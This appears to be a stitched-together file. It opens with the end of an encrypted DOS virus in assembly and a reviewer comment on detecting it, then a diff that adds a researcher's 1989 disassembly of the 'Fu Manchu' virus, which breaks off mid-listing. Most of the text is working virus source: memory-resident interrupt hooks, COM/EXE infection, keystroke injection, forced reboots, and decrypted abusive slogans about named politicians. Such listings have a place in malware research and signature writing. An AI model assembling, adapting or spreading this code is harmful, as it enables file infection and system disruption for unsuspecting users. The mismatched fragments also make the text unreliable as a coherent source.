write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
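Review bot: Nothing in this file marks it as a live sample or summarises what an analyst should look for; the generator comments describe single instructions only. A short header should state that `search_files`/`traverse` walk the directory tree from the root and `infect_file` appends to `*.COM` files, and that `stop_tracing` and `lock_keys` are anti-debugging code. It should also say that everything between `start_of_code` and `end_of_code` is XOR-ed word-wise with a key `encrypt_code` takes from the BIOS timer. The `[VCL]` marker and the `note` text lie inside that encrypted range, so they will not appear in plain form in an infected file. Signature work therefore has to rely on the unencrypted entry code at `start` and on the `encrypt_decrypt` stub, which `encrypt_code` appears to toggle between SI and DI forms on each copy.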
@@ -0,0 +1,944 @@
page 65,132
title The 'Fu Manchu' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Fu Manchu' Virus º
; º Disassembled by Joe Hirst, June 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The virus occurs attached to the beginning of a COM file, or the end
; of an EXE file. A COM file also has the six-byte 'marker' attached
; to the end.
; This virus is a variation of the Jerusalem virus
; The disassembly has been tested by re-assembly using MASM 5.0.
RAM SEGMENT AT 0
; System data
ORG 3FCH
BW03FC DW ?
BB03FE DB ?
ORG 417H
BB0417 DB ? ; Key states
ORG 46CH
BB046C DB ? ; System clock - low byte
ORG 2CH
ENV_SG DW ? ; Segment address of environment
RAM ENDS
RAM40 SEGMENT at 400H
ORG 1AH
BW041A DW ? ; Key token in pointer
BW041C DW ? ; Key token out pointer
ORG 80H
BW0480 DW ? ; Key token buffer start pointer
BW0482 DW ? ; Key token buffer end pointer
RAM40 ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,ES:RAM
; Entry point when attached to a COM file
START: JMP BP0010
DB 'sAX'
VR_SIG DB 'rEMHOr'
VIR_RT EQU THIS DWORD
V_RTOF DW 100H
V_RTSG DW 323FH
INT_08 EQU THIS DWORD
I08OFF DW 0106H ; Int 8 offset
I08SEG DW 0E95H ; Int 8 segment
INT_09 EQU THIS DWORD
I09OFF DW 02E9H ; Int 9 offset
I09SEG DW 0DC6H ; Int 9 segment
INT_16 EQU THIS DWORD
I16OFF DW 0 ; Int 16H offset
I16SEG DW 0 ; Int 16H segment
INT_21 EQU THIS DWORD
I21OFF DW 138DH ; Int 21H offset
I21SEG DW 029BH ; Int 21H segment
INT_24 EQU THIS DWORD
I24OFF DW 04EBH ; Int 24H offset
I24SEG DW 3228H ; Int 24H segment
BEGIN DW 0 ; Initial value for AX
F_SIZE DW 49H ; Total file size
TCOUNT1 DW 0 ; Timer count (low)
TCOUNT2 DW 0 ; Timer count (high)
ST_ES1 DW 3195H ; Original ES
SET_PA DW 00A2H
; Program parameter block
PPB_01 DW 0 ; Environment address
PPB_02 DW 0080H ; Command line offset
PPB_03 DW 3195H ; Command line segment
PPB_04 DW 005CH ; FCB1 offset
PPB_05 DW 3195H ; FCB1 segment
PPB_06 DW 006CH ; FCB2 offset
PPB_07 DW 3195H ; FCB2 segment
PRG_SP DW 0 ; Initial stack pointer store
PRG_SS DW 31A5H ; Initial stack segment store
PROGRM EQU THIS DWORD
PRGOFF DW 0 ; Initial code offset store
PRGSEG DW 31A5H ; Initial code segment store
SS_ST1 DW 0 ; Store for system area data (1)
SS_ST2 DB 86H ; Store for system area data (2)
; .EXE header store
EXEHED DB 4DH, 5AH ; 00 .EXE header ident
EXHD01 DW 0070H ; 02 Bytes in last page
EXHD02 DW 0006H ; 04 Size of file in pages
EXHD03 DW 0000H ; 06 Number of relocation entries
EXHD04 DW 0020H ; 08 Size of header in paragraphs
EXHD05 DW 0000H ; 0A Minimum extra storage required
EXHD06 DW -1 ; 0C Maximum extra storage required
EXHD07 DW 0005H ; 0E Initial stack segment
EXHD08 DW ENDADR ; 10 Initial stack pointer
EXHD09 DW 1988H ; 12 Negative checksum
EXHD10 DW 0223H ; 14 Initial code offset
EXHD11 DW 0005H ; 16 Initial code segment
DW 01EH ; 18 Relative offset of reloc table
DW 0 ; 1A Overlay number
SIGBUF DB 069H, 06FH, 06EH, 00DH, 00AH, 024H
F_HAND DW 5 ; File handle
F_ATTS DW 0020H ; File attributes
F_DATE DW 1273H ; File date
F_TIME DW 4972H ; File time
F_SIZ1 DW 0250H ; Low-order file size
F_SIZ2 DW 0 ; High-order file size
F_PATH EQU THIS DWORD
FPTHOF DW 3D5BH ; Program pathname offset
FPTHSG DW 9B70H ; Program pathname segment
COM_CM DB 'COMMAND.COM'
EXE_SW DB 0 ; EXE switch - 0 = .COM extension
MEM_SW DW 1 ; Memory allocated switch
OUT_SW DB 0 ; Output in progress switch
BYTSEC DW 0200H ; Bytes per sector
PARAGR DW 0010H ; Size of a paragraph
; The next fields are encrypted, and translate to:
;STRNG1 DB 'fu manchu virus 3/10/88 - latest in the new fun line!', 0
;STRNG2 DB 'thatcher is a cunt ', 0
;STRNG3 DB 'reagan is an arsehole ', 0
;STRNG4 DB 'botha is a bastard ', 0
;STRNG5 DB 'waldheim is a Nazi ', 0
;STRNG6 DB 'fuck', 8, 8, 8, 8, 0
;STRNG7 DB 'cunt', 8, 8, 8, 8, 0
;STRNG8 DB 'The world will hear from me again! ', 0
STRNG1 DB 0C9H, 0DAH, 08FH, 0C2H, 0CEH, 0C1H, 0CCH, 0C7H
DB 0DAH, 08FH, 0D9H, 0C6H, 0DDH, 0DAH, 0DCH, 08FH
DB 09CH, 080H, 09EH, 09FH, 080H, 097H, 097H, 08FH
DB 082H, 08FH, 0C3H, 0CEH, 0DBH, 0CAH, 0DCH, 0DBH
DB 08FH, 0C6H, 0C1H, 08FH, 0DBH, 0C7H, 0CAH, 08FH
DB 0C1H, 0CAH, 0D8H, 08FH, 0C9H, 0DAH, 0C1H, 08FH
DB 0C3H, 0C6H, 0C1H, 0CAH, 08EH, 0
STRNG2 DB 0DBH, 0C7H, 0CEH, 0DBH, 0CCH, 0C7H, 0CAH, 0DDH
DB 08FH, 0C6H, 0DCH, 08FH, 0CEH, 08FH, 0CCH, 0DAH
DB 0C1H, 0DBH, 08FH, 0
STRNG3 DB 0DDH, 0CAH, 0CEH, 0C8H, 0CEH, 0C1H, 08FH, 0C6H
DB 0DCH, 08FH, 0CEH, 0C1H, 08FH, 0CEH, 0DDH, 0DCH
DB 0CAH, 0C7H, 0C0H, 0C3H, 0CAH, 08FH, 0
STRNG4 DB 0CDH, 0C0H, 0DBH, 0C7H, 0CEH, 08FH, 0C6H, 0DCH
DB 08FH, 0CEH, 08FH, 0CDH, 0CEH, 0DCH, 0DBH, 0CEH
DB 0DDH, 0CBH, 08FH, 0
STRNG5 DB 0D8H, 0CEH, 0C3H, 0CBH, 0C7H, 0CAH, 0C6H, 0C2H
DB 08FH, 0C6H, 0DCH, 08FH, 0CEH, 08FH, 0E1H, 0CEH
DB 0D5H, 0C6H, 08FH, 0
STRNG6 DB 0C9H, 0DAH, 0CCH, 0C4H, 0A7H, 0A7H, 0A7H, 0A7H, 0
STRNG7 DB 0CCH, 0DAH, 0C1H, 0DBH, 0A7H, 0A7H, 0A7H, 0A7H, 0
STRNG8 DB 0FBH, 0C7H, 0CAH, 08FH, 0D8H, 0C0H, 0DDH, 0C3H
DB 0CBH, 08FH, 0D8H, 0C6H, 0C3H, 0C3H, 08FH, 0C7H
DB 0CAH, 0CEH, 0DDH, 08FH, 0C9H, 0DDH, 0C0H, 0C2H
DB 08FH, 0C2H, 0CAH, 08FH, 0CEH, 0C8H, 0CEH, 0C6H
DB 0C1H, 08EH, 08FH, 08FH, 08FH, 0
; Each entry is:
; DB length to find
; DB length found
; DW pointer to string
TABLE DB 10, 0
DW STRNG1
DB 9, 0
DW STRNG2
DB 7, 0
DW STRNG3
DB 6, 0
DW STRNG4
DB 9, 0
DW STRNG5
DB 4, 0
DW STRNG6
DB 4, 0
DW STRNG7
DB 0
TABOUT DW 0 ; Table entry for output
; Key number table for fake input
KEYTAB DB 03H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 00 - 07
DB 0EH, 0FH, 1CH, 25H, 26H, 1CH, 31H, 18H ; 08 - 0F
DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 10 - 17
DB 2DH, 15H, 2CH, 01H, 2BH, 1BH, 07H, 0CH ; 18 - 1F
DB 39H, 02H, 28H, 04H, 05H, 06H, 08H, 28H ; 20 - 27
DB 0AH, 0BH, 09H, 0DH, 33H, 0CH, 34H, 35H ; 28 - 2F
DB 0BH, 02H, 03H, 04H, 05H, 06H, 07H, 08H ; 30 - 37
DB 09H, 0AH, 27H, 27H, 33H, 0DH, 34H, 35H ; 38 - 3F
DB 03H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 40 - 47
DB 23H, 17H, 24H, 25H, 26H, 32H, 31H, 18H ; 48 - 4F
DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 50 - 57
DB 2DH, 15H, 2CH, 1AH, 2BH, 1BH, 07H, 0CH ; 58 - 5F
DB 29H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 60 - 67
DB 23H, 17H, 24H, 25H, 26H, 32H, 31H, 18H ; 68 - 6F
DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 70 - 77
DB 2DH, 15H, 2CH, 1AH, 2BH, 1BH, 29H, 0EH ; 78 - 7F
; This section assumes a COM origin of 100H
BP0010: CLD
MOV AH,0E1H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E1H ; Test for unchanged
JNB BP0020 ; Branch if invalid reply
CMP AH,4 ; Test for standard "yes"
JB BP0020 ; Branch if non-standard
MOV AH,0DDH ; Replace program over virus
MOV DI,0100H ; Initial offset
MOV SI,OFFSET ENDADR ; Length of virus
ADD SI,DI ; Add initial offset
MOV CX,F_SIZE[DI] ; Get total filesize
INT 21H ; DOS service (Virus - 2)
; Virus not in system, or non-communicating variety
BP0020: MOV AX,CS ; Get current segment
ADD AX,10H ; Address past PSP
MOV PRG_SP,SP ; Save current value
MOV SS,AX ; \ Set up stack
MOV SP,OFFSET ENDADR+100H ; /
PUSH AX ; Segment for return
MOV AX,OFFSET BP0030 ; \ Offset for return
PUSH AX ; /
RETF ; "Return" to next instruction
; We now have an origin of zero
; Entry point when attached to an EXE file
BP0030: CLD
PUSH ES
MOV ST_ES1,ES ; Save original ES
MOV PPB_03,ES ; \
MOV PPB_05,ES ; ) Segments in PPB
MOV PPB_07,ES ; /
MOV AX,ES ; \ Segment relocation factor
ADD AX,10H ; /
ADD PRGSEG,AX ; Initial code segment store
ADD PRG_SS,AX ; Initial stack segment store
MOV AH,0E1H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E1H ; Test for unchanged
JNB BP0040 ; Branch if not
CMP AH,4 ; Test for standard "yes"
POP ES
MOV SS,PRG_SS ; Initial stack segment store
MOV SP,PRG_SP ; Initial stack pointer store
JMP PROGRM ; Start of actual program
; Virus is not already active
BP0040: XOR AX,AX ; \ Address page zero
MOV ES,AX ; /
MOV AX,BW03FC ; \ Save system area data (1)
MOV SS_ST1,AX ; /
MOV AL,BB03FE ; \ Save system area data (2)
MOV SS_ST2,AL ; /
MOV BW03FC,0A4F3H ; Store REPZ MOVSB
MOV BB03FE,0CBH ; Store RETF
POP AX ; \
ADD AX,10H ; ) Address past PSP
MOV ES,AX ; /
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV CX,OFFSET ENDADR ; Length of virus
XOR SI,SI ; \ Clear registers
MOV DI,SI ; /
PUSH ES ; \
MOV AX,OFFSET BP0050 ; ) Set up return address
PUSH AX ; /
DB 0EAH ; \ Far jump to move instruction
DW BW03FC, 0 ; /
BP0050: MOV AX,CS ; \
MOV SS,AX ; ) Set up internal stack
MOV SP,OFFSET ENDADR+100H ; /
XOR AX,AX ; \ Address page zero
MOV DS,AX ; /
ASSUME DS:RAM,ES:NOTHING
MOV AX,SS_ST1 ; \ Restore system area data (1)
MOV BW03FC,AX ; /
MOV AL,SS_ST2 ; \ Restore system area data (2)
MOV BB03FE,AL ; /
MOV BX,SP ; Get stack pointer
MOV CL,4 ; \ Convert to paragraphs
SHR BX,CL ; /
ADD BX,10H ; Allow for PSP
MOV SET_PA,BX ; Save number of paragraphs
MOV ES,ST_ES1 ; Get original ES
MOV AH,4AH ; Set block
INT 21H ; DOS service (Set block)
MOV AX,3521H ; Get interrupt 21H
INT 21H ; DOS service (Get int)
MOV I21OFF,BX ; Save interrupt 21H offset
MOV I21SEG,ES ; Save interrupt 21H segment
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV DX,OFFSET BP0170 ; Interrupt 21H routine
MOV AX,2521H ; Set interrupt 21H
INT 21H ; DOS service (Set int)
MOV ES,ST_ES1 ; Get original ES
ASSUME ES:RAM
MOV ES,ES:ENV_SG ; Get environment segment
XOR DI,DI ; Start of environment
MOV CX,7FFFH ; Allow for 32K environment
XOR AL,AL ; Search for zero
BP0060: REPNZ SCASB ; Find zero
CMP ES:[DI],AL ; Is following character zero
LOOPNZ BP0060 ; Search again if not
MOV DX,DI ; Save pointer
ADD DX,3 ; Address pathname
MOV AX,4B00H ; Load and execute program
PUSH ES ; \ Set DS to ES
POP DS ; /
PUSH CS ; \ Set ES to CS
POP ES ; /
ASSUME DS:RAM,ES:NOTHING
MOV BX,OFFSET PPB_01 ; PPB (for load and execute)
PUSH DS
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
; Install interrupt 9 routine
MOV AX,3509H ; Get interrupt 9
INT 21H ; DOS service (Get int)
MOV I09OFF,BX ; Save interrupt 9 offset
MOV I09SEG,ES ; Save interrupt 9 segment
MOV AX,2509H ; Set interrupt 9
MOV DX,OFFSET BP0150 ; Interrupt 9 routine
INT 21H ; DOS service (Set int)
MOV AH,2AH ; Get date
INT 21H ; DOS service (Get date)
CMP CX,07C5H ; Year = 1989
JL BP0070 ; Branch if before
CMP DH,8 ; Month = August
JL BP0070 ; Branch if before
; Install interrupt 16H routine
MOV OUT_SW,0 ; Set off output switch
MOV AX,3516H ; Get interrupt 16H
INT 21H ; DOS service (Get int)
MOV I16OFF,BX ; Save interrupt 16H offset
MOV I16SEG,ES ; Save interrupt 16H segment
MOV AX,2516H ; Set interrupt 16H
MOV DX,OFFSET BP0540 ; Interrupt 16H routine
INT 21H ; DOS service (Set int)
BP0070: MOV BL,BB046C ; Get low byte of system clock
MOV BH,BL ; Copy
AND BX,0F00FH ; Isolate nibbles
CMP BL,0 ; Is low nibble of clock zero?
JNE BP0080 ; Branch if not
MOV CL,4 ; Bits to move
SHR BH,CL ; Move top nibble to bottom
CMP BH,0 ; Is second nibble of clock zero?
JE BP0080 ; Branch if yes
XOR AX,AX ; Clear register
MOV TCOUNT1,AX ; Set timer count (low)
MOV AL,BH ; Get second nibble of system clock
MOV TCOUNT2,AX ; Set timer count (high)
; Install interrupt 8 routine
MOV AX,3508H ; Get interrupt 8
INT 21H ; DOS service (Get int)
MOV I08OFF,BX ; Save interrupt 8 offset
MOV I08SEG,ES ; Save interrupt 8 segment
MOV AX,2508H ; Set interrupt 8
MOV DX,OFFSET BP0100 ; Interrupt 8 routine
INT 21H ; DOS service (Set int)
BP0080: POP DX
POP CX
POP BX
POP AX
POP ES
POP DS
ASSUME DS:NOTHING
PUSHF ; Fake an interrupt
CALL INT_21 ; Interrupt 21H (Load and execute)
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
MOV AH,4DH ; Get return code of child process
INT 21H ; DOS service (Get return code)
MOV AH,31H ; Keep process
MOV DX,OFFSET ENDADR ; Length of program
MOV CL,4 ; \ Convert to paragraphs
SHR DX,CL ; /
ADD DX,10H ; Add length of PSP
INT 21H ; DOS service (Keep process)
; Interrupt 24H
BP0090: XOR AL,AL ; Ignore the error
IRET
; Interrupt 8
BP0100: SUB TCOUNT1,1 ; \ Subtract from timer count
SBB TCOUNT2,0 ; /
JNZ BP0140 ; Branch if not zero
CMP TCOUNT1,0 ; Is low count zero?
JNZ BP0140 ; Branch if not
BP0110: PUSH CS ; \ Set DS to CS
POP DS ; /
MOV AX,3 ; Mode three
INT 10H ; VDU I/O
MOV AH,2 ; Move cursor
MOV BH,0 ; Page zero
MOV DX,0A14H ; Row ten column twenty
INT 10H ; VDU I/O
MOV SI,OFFSET STRNG8 ; Address message
BP0120: LOOP BP0120 ; Delay between characters
LODSB ; Get a character
CMP AL,0 ; Is that the end?
JE BP0130 ; Branch if yes
XOR AL,0AFH ; Decrypt character
MOV AH,14 ; Write in TTY mode
INT 10H ; VDU I/O
JMP BP0120 ; Next character
BP0130: DB 0EAH ; Far jump to BIOS initialisation
DW 0FFF0H, 0F000H
BP0140: JMP INT_08 ; Interrupt 8
; Interrupt 9
ASSUME DS:RAM
BP0150: PUSH AX
PUSH BX
PUSH DS
XOR AX,AX ; \ Address zero
MOV DS,AX ; /
IN AL,60H ; Get keyboard token
MOV BL,BB0417 ; Get key states
TEST BL,8 ; Alt key depressed?
JZ BP0160 ; Branch if not
TEST BL,4 ; Ctrl key depressed?
JZ BP0160 ; Branch if not
CMP AL,53H ; Del character token?
JNE BP0160 ; Branch if not
AND BL,0F3H ; Set off Alt & Ctrl states
MOV BB0417,BL ; Replace key states
IN AL,61H ; Get Port B
MOV AH,AL ; Save value
OR AL,80H ; Set on keyboard reset bit
OUT 61H,AL ; Output port B
XCHG AL,AH ; Recover original Port B value
OUT 61H,AL ; Output port B
JMP BP0110 ; Message and reboot
BP0160: POP DS
POP BX
POP AX
JMP INT_09 ; Interrupt 9
; Interrupt 21H
BP0170: PUSHF
CMP AH,0E1H ; Virus "are you there" call
JNE BP0180 ; Branch if other call
MOV AX,0400H ; Standard "yes"
POPF
IRET
BP0180: CMP AH,0DDH ; Virus move and execute COM call
JE BP0200 ; Branch if yes
CMP AX,4B00H ; Is it load and execute
JNE BP0190 ; Branch if not
JMP BP0210 ; Process load and execute
BP0190: POPF
JMP INT_21 ; Interrupt 21H
; Move program down and execute (COM only) call
ASSUME DS:NOTHING
BP0200: POP AX
POP AX ; Retrieve return offset
MOV AX,100H ; Replace with start address
MOV V_RTOF,AX ; Store in return jump
POP AX ; Retrieve return segment
MOV V_RTSG,AX ; Store in return jump
REPZ MOVSB ; Restore program to beginning
POPF
MOV AX,BEGIN ; Start with zero register
JMP VIR_RT ; Start actual program
; Process load and execute program
BP0210: MOV F_HAND,-1 ; No file handle
MOV MEM_SW,0 ; Set off memory allocated switch
MOV FPTHOF,DX ; Save pathname offset
MOV FPTHSG,DS ; Save pathname segment
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
CLD
MOV DI,DX ; Point to file pathname
XOR DL,DL ; Default drive
CMP BYTE PTR [DI+1],3AH ; Test second character for ':'
JNE BP0220 ; Branch if not
MOV DL,[DI] ; Get drive letter
AND DL,1FH ; Convert to number
BP0220: MOV AH,36H ; Get disk free space
INT 21H ; DOS service (Get disk free)
CMP AX,-1 ; Test for invalid drive
JNE BP0240 ; Branch if not
BP0230: JMP BP0530 ; Terminate
BP0240: MUL BX ; Calc number of free sectors
MUL CX ; Calc number of free bytes
OR DX,DX ; Test high word of result
JNZ BP0250 ; Branch if not zero
CMP AX,OFFSET ENDADR ; Length of virus
JB BP0230 ; Terminate if less
BP0250: MOV DX,FPTHOF ; Get pathname offset
PUSH DS ; \ Set ES to DS
POP ES ; /
XOR AL,AL ; Test character - zero
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
MOV SI,FPTHOF ; Get pathname offset
BP0260: MOV AL,[SI] ; Get pathname character
OR AL,AL ; Test for a character
JZ BP0280 ; Finish if none
CMP AL,61H ; Test for 'a'
JB BP0270 ; Branch if less
CMP AL,7AH ; Test for 'z'
JA BP0270 ; Branch if above
SUB BYTE PTR [SI],20H ; Convert to uppercase
BP0270: INC SI ; Address next character
JMP BP0260 ; Process next character
BP0280: MOV CX,0BH ; Load length 11
SUB SI,CX ; Address back by length
MOV DI,OFFSET COM_CM ; 'COMMAND.COM'
PUSH CS ; \ Set ES to CS
POP ES ; /
MOV CX,0BH ; Load length again
REPZ CMPSB ; Compare
JNE BP0290 ; Continue if not command.com
JMP BP0530 ; Terminate
BP0290: MOV AX,4300H ; Get file attributes
INT 21H ; DOS service (Get attributes)
JB BP0300 ; Follow chain of error branches
MOV F_ATTS,CX ; Save file attributes
BP0300: JB BP0320 ; Follow chain of error branches
XOR AL,AL ; Scan character - zero
MOV EXE_SW,AL ; Set EXE switch off
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV DI,DX ; Pointer to pathname
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
CMP BYTE PTR [DI-2],4DH ; Is last letter 'M'
JE BP0310 ; Branch if yes
CMP BYTE PTR [DI-2],6DH ; Is last letter 'm'
JE BP0310 ; Branch if yes
INC EXE_SW ; Set EXE switch on
BP0310: MOV AX,3D00H ; Open handle, read only
INT 21H ; DOS service (Open handle)
BP0320: JB BP0330 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV BX,AX ; File handle
CMP EXE_SW,0 ; Test EXE switch
JE BP0340 ; Branch if off
; Test EXE file for infection
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0330: JB BP0370 ; Follow chain of error branches
CMP EXHD09,1988H ; Negative checksum
JNE BP0360 ; Branch if not infected
JMP BP0350 ; Dont infect
ASSUME DS:NOTHING
BP0340: MOV AX,4202H ; Move file pointer
MOV CX,-1 ; \ End of file minus 6
MOV DX,-6 ; /
INT 21H ; DOS service (Move pointer)
JB BP0320 ; Follow chain of error branches
ADD AX,6 ; Total file size
MOV F_SIZE,AX ; Save total file size
MOV CX,6 ; Length to read
MOV DX,OFFSET SIGBUF ; Infection test buffer
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
MOV DI,DX ; Address test buffer
MOV SI,OFFSET VR_SIG ; Signature
REPZ CMPSB ; Compare signatures
JNE BP0360 ; Branch if not infected
BP0350: MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
JMP BP0530 ; Terminate
BP0360: MOV AX,3524H ; Get interrupt 24H
INT 21H ; DOS service (Get int)
MOV I24OFF,BX ; Save interrupt 24H offset
MOV I24SEG,ES ; Save interrupt 24H segment
MOV DX,OFFSET BP0090 ; Interrupt 24H routine
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
LDS DX,F_PATH ; Address program pathname
XOR CX,CX ; No attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
ASSUME DS:NOTHING
BP0370: JB BP0380 ; Follow chain of error branches
MOV BX,F_HAND ; Get file handle
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
MOV F_HAND,-1 ; No file handle
MOV AX,3D02H ; Open handle read/write
INT 21H ; DOS service (Open handle)
JB BP0380 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV BX,F_HAND ; Get file handle
MOV AX,5700H ; Get file date and time
INT 21H ; DOS service (Get file date)
MOV F_DATE,DX ; Save file date
MOV F_TIME,CX ; Save file time
MOV AX,4200H ; Move file pointer
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
INT 21H ; DOS service (Move pointer)
BP0380: JB BP0410 ; Follow chain of error branches
CMP EXE_SW,0 ; Test EXE switch
JE BP0390 ; Branch if off
JMP BP0430 ; Process EXE file
; .COM file processing
BP0390: MOV BX,1000H ; 64K of memory wanted
MOV AH,48H ; Allocate memory
INT 21H ; DOS service (Allocate memory)
JNB BP0400 ; Branch if successful
MOV AH,3EH ; Close handle
MOV BX,F_HAND ; Get file handle
INT 21H ; DOS service (Close handle)
JMP BP0530 ; Terminate
BP0400: INC MEM_SW ; Set on memory allocated switch
MOV ES,AX ; Segment of allocated memory
XOR SI,SI ; Start of virus
MOV DI,SI ; Start of allocated memory
MOV CX,OFFSET ENDADR ; Length of virus
REPZ MOVSB ; Copy virus to allocated
MOV DX,DI ; Address after virus
MOV CX,F_SIZE ; Total file size
MOV BX,F_HAND ; Get file handle
PUSH ES ; \ Set DS to ES
POP DS ; /
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0410: JB BP0420 ; Follow chain of error branches
ADD DI,CX ; Add previous file size
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
MOV SI,OFFSET VR_SIG ; Signature
MOV CX,6 ; Length to move
REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end
MOV CX,DI ; Length to write
XOR DX,DX ; Start of allocated
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0420: JB BP0440 ; Follow chain of error branches
JMP BP0510 ; Free memory and reset values
; .EXE file processing
BP0430: MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0440: JB BP0460 ; Follow chain of error branches
MOV EXHD09,1988H ; Negative checksum
MOV AX,EXHD07 ; \ Store initial stack segment
MOV PRG_SS,AX ; /
MOV AX,EXHD08 ; \ Store initial stack pointer
MOV PRG_SP,AX ; /
MOV AX,EXHD10 ; \ Store initial code offset
MOV PRGOFF,AX ; /
MOV AX,EXHD11 ; \ Store initial code segment
MOV PRGSEG,AX ; /
MOV AX,EXHD02 ; Get size of file in pages
CMP EXHD01,0 ; Number of bytes in last page
JE BP0450 ; Branch if none
DEC AX ; One less page
BP0450: MUL BYTSEC ; Bytes per sector
ADD AX,EXHD01 ; \ Add bytes in last page
ADC DX,0 ; /
ADD AX,0FH ; \ Round up
ADC DX,0 ; /
AND AX,0FFF0H ; Clear bottom figure
MOV F_SIZ1,AX ; Save low-order file size
MOV F_SIZ2,DX ; Save high-order file size
ADD AX,OFFSET ENDADR ; \ Add virus length
ADC DX,0 ; /
BP0460: JB BP0480 ; Follow chain of error branches
DIV BYTSEC ; Bytes per sector
OR DX,DX ; Test odd bytes
JZ BP0470 ; Branch if none
INC AX ; One more page for odd bytes
BP0470: MOV EXHD02,AX ; Store size of file in pages
MOV EXHD01,DX ; Store bytes in last page
MOV AX,F_SIZ1 ; Low-order file size
MOV DX,F_SIZ2 ; High-order file size
DIV PARAGR ; Size of a paragraph
SUB AX,EXHD04 ; Size of header in paragraphs
MOV EXHD11,AX ; Initial code segment
MOV EXHD10,OFFSET BP0030 ; Initial code offset
MOV EXHD07,AX ; Initial stack segment
MOV EXHD08,OFFSET ENDADR ; Initial stack pointer
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0480: JB BP0490 ; Follow chain of error branches
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0490: JB BP0500 ; Follow chain of error branches
CMP AX,CX ; Has same length been written
JNE BP0510 ; Branch if not
MOV DX,F_SIZ1 ; Low-order file size
MOV CX,F_SIZ2 ; High-order file size
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0500: JB BP0510 ; Follow chain of error branches
XOR DX,DX ; Address beginning of virus
MOV CX,OFFSET ENDADR ; Length of virus
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
ASSUME DS:NOTHING
BP0510: CMP MEM_SW,0 ; Test memory allocated switch
JE BP0520 ; Branch if off
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
BP0520: CMP F_HAND,-1 ; Test file handle
JE BP0530 ; Terminate if none
MOV BX,F_HAND ; Get file handle
MOV DX,F_DATE ; Get file date
MOV CX,F_TIME ; Get file time
MOV AX,5701H ; Set file date and time
INT 21H ; DOS service (Set file date)
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
LDS DX,F_PATH ; Address program pathname
MOV CX,F_ATTS ; Load file attributes
